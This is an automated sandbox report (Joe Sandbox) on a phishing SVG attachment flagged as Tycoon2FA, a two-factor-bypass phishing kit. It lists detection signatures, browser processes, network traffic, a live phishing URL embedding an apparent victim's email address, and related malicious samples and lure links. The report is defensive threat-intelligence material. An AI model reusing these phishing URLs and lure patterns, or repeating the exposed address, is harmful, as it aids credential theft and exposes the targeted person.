Edit tour

Windows Analysis Report
FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg

Overview

General Information

Sample name:	FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg
Analysis ID:	1646686
MD5:	8174817b1f970afab3559c459ca04c67
SHA1:	526676688ad585150faaa81c33953cbade134786
SHA256:	432178434ba76ee05845b3c5e7bf45fdabe76a0ea747e0b6d09f104cb2225683
Infos:

Detection

Invisible JS, Tycoon2FA

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

Yara detected AntiDebug via timestamp check

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

HTML page contains suspicious javascript code

Yara detected JavaScript embedded in SVG

Creates files inside the system directory

Deletes files inside the Windows folder

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Classification

Process Tree

System is w11x64_office

chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 3600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

chrome.exe (PID: 7844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg	JoeSecurity_JavaScriptembeddedinSVG	Yara detected JavaScript embedded in SVG	Joe Security
FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security

HTML

Source	Rule	Description	Author
0.0..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.4.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.4.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
1.6.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
1.3.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.3.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.7..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
1.0.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
1.0.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 6 entries

HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742797155074&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 3656Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox View	IP Address: 151.101.194.137 151.101.194.137

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.161.139
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8VVgl7/$christo@draftworx.com HTTP/1.1Host: mo.zonqdkqezktw.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mo.zonqdkqezktw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mo.zonqdkqezktw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InB6Y2JUNkJ5NXBpYlFQQmdoQ1dIVnc9PSIsInZhbHVlIjoidTJEblVVM1dlbHplTlhLcHQrM0JDK2FiaFQ2YVhMOVhMTzYzczZiSVJzN2IzOWRHQStoWmZOOUNFNHFQL2JIYjE2MGFJY09CWTVjbE1tM2hMemttMzdTdENLODNBU2RZdVQ0MklRT1ZUcXdheG1NeEFPcGx2Z2k1bG40YzFTTnMiLCJtYWMiOiJkNjlhODY5NWI2OTZhMTMzYmY5NTA2NmZhY2M0MjNkYTAzYjRlZTJjYzQwZTQ0MmFkZTc2ZmQ0NjI1YmU0YWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBMMWhLN1c0Nyt4aDlPMlgvU3pwWUE9PSIsInZhbHVlIjoiWmhRcUY0MFRLRTVvSVNXMVM1UDZ4Nmx4dDJIWGhXaFlRNjUxOFZHeUFqV0dUdDRPcmZZdDZ6eEN4aHRLLzlEaXdiNGEyY3R2Rk1BYXluSWdSU1VvOW94alNUek5mV0t0ZmovUlkxaHFNbFp4am1lVUNsa0FrSHhzeUxrNVZCUDIiLCJtYWMiOiI5OWIxYmNhZDIxZjJiNDU3NjFlMDYyMzFmZjUzMzM1MjM0ZGJkMTA4YzY4MGVkZTI3N2M5YTAzYTRjOTNmMTFjIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: mo.zonqdkqezktw.es
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 06:19:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=334&min_rtt=316&rtt_var=124&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2266&delivery_rate=9026785&cwnd=252&unsent_bytes=0&cid=f1e1fc67d8a9b90e&ts=167&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 92540eb6fafa2142-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=98686&min_rtt=97536&rtt_var=21740&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1923&delivery_rate=38157&cwnd=249&unsent_bytes=0&cid=0740d767012a2c32&ts=2107&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60817
Source: unknown	Network traffic detected: HTTP traffic on port 60822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60840
Source: unknown	Network traffic detected: HTTP traffic on port 60835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60860
Source: unknown	Network traffic detected: HTTP traffic on port 60836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60853

Source: unknown	HTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.24:60832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.24:60834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.24:60835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.24:60836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.24:60839 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6924_2083986824

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6924_2083986824

Jump to behavior

Source: classification engine

Classification label: mal84.phis.evad.winSVG@23/6@9/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 1.4.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://mo.zonqdkqezktw.es/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
mo.zonqdkqezktw.es	104.21.80.1	true	true	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	high
code.jquery.com	151.101.194.137	true	false	high
onedscolprdeus00.eastus.cloudapp.azure.com	20.42.72.131	true	false	high
www.google.com	142.251.32.100	true	false	high
browser.events.data.msn.cn	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com	false		unknown
https://mo.zonqdkqezktw.es/favicon.ico	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://a.nel.cloudflare.com/report/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX	false		high
https://browser.events.data.msn.cn/OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742797155074&w=0&anoncknm=al_app_anon&NoResponseBody=true	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.80.1	mo.zonqdkqezktw.es	United States	13335	CLOUDFLARENETUS	true
142.251.32.100	www.google.com	United States	15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.24

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1646686
Start date and time:	2025-03-24 07:18:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg
Detection:	MAL
Classification:	mal84.phis.evad.winSVG@23/6@9/5
Cookbook Comments:	Found application associated with file extension: .svg

Warnings

Exclude process from analysis (whitelisted): SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.251.32.99, 142.250.65.206, 142.251.40.174, 172.253.115.84, 142.250.176.206, 142.250.80.46, 142.250.81.238, 142.250.65.170, 142.250.80.106, 142.250.64.106, 142.251.40.106, 142.250.176.202, 142.250.72.106, 142.251.40.170, 142.251.40.234, 142.250.80.74, 142.251.41.10, 142.251.40.138, 172.217.165.138, 142.250.80.10, 142.250.80.42, 142.251.40.202, 142.250.64.74, 23.219.161.105, 142.251.32.110, 142.251.40.206, 142.250.65.234, 142.251.32.106, 142.250.81.234, 142.250.65.202, 142.251.40.227, 142.250.80.35, 142.250.80.78, 142.251.40.110, 172.202.163.200
Excluded domains from analysis (whitelisted): accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.194.137	http://2gewf232.blogspot.com.au/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery.min.js
	https://kjhgt55555555555.blogspot.com/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery.min.js
	http://kjhgt55555555555.blogspot.cz/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery.min.js
	http://facebooksecurity.blogspot.ro/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://facebooksecurity.blogspot.dk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://soporte-store.info/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.9.1.js
	http://facebooksecurity.blogspot.pe/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
104.21.80.1	UW2025-020#U00b7pdf.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.dramavietsub.net/rcu7/
	5047792048pdf.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.dramavietsub.net/rcu7/?mbHTH=XRIXlKxnJVFUKEthJ4b1to75Xwh5Yc5hiRmvyKKqHzw4uge11MOII5dk9Gg7nuPf7mux8eELG7q95sMQ7MUe1hBR0dSMf0JiCewN4BGJ1X0IJ/mT1e/Enwc=&9j=Plml
	16Vzai4jwT.exe	Get hash	malicious	CobaltStrike	Browse	cpvnxker.xyz/headimage.jpg
	MG710417.exe	Get hash	malicious	Azorult	Browse	gd53.cfd/TL341/index.php
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/scc1/five/fre.php
	DHL AWB Receipt_pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	Marzec 2025-faktura.pdf.exe	Get hash	malicious	FormBook	Browse	www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
	z1companyProfileandproducts.exe	Get hash	malicious	FormBook	Browse	www.dd87558.vip/uoki/
	http://7a.ithuupvudv.ru	Get hash	malicious	Unknown	Browse	7a.ithuupvudv.ru/favicon.ico
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/scc1/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	https://offce365.auramisteriosafyr.it.com/CM4kN/	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://steigerwaldt.com/	Get hash	malicious	Unknown	Browse	151.101.66.137
	Swift.Copy(21 Mar 2025).pdf.html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFguqKBJA-2BlCiR08w7qJIKltwWs1iwx4iDdKHxA5CYPlQURzm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZPtKM-2FoAva2x6XydS-2BQkAaQFLL0bTHd-2BvpXWEIQw9OO3bs7wPk5-2FNGT2lT8nlX5ZgLnybcv-2FqVaWsH3iKC3k-2FYDOulAWlkfFO-2F-2BgJKklGUh9CJuKEwyNd9zNdCIOytI452XQw-2B8x6xiJPAqHz27f1LkfRWUbtJdWgeQgZHjwMrUD5-2Bofn-2BpMejbkxPyCuPtUnwWOwh3Q69DcfaaJRyxPZ-2FuN-2FnCbycFi8LhnIQX7rSKvUsNy61FOnwomGAQ5UmVDc4-3D#Cjosh@ltvco.com	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.130.137
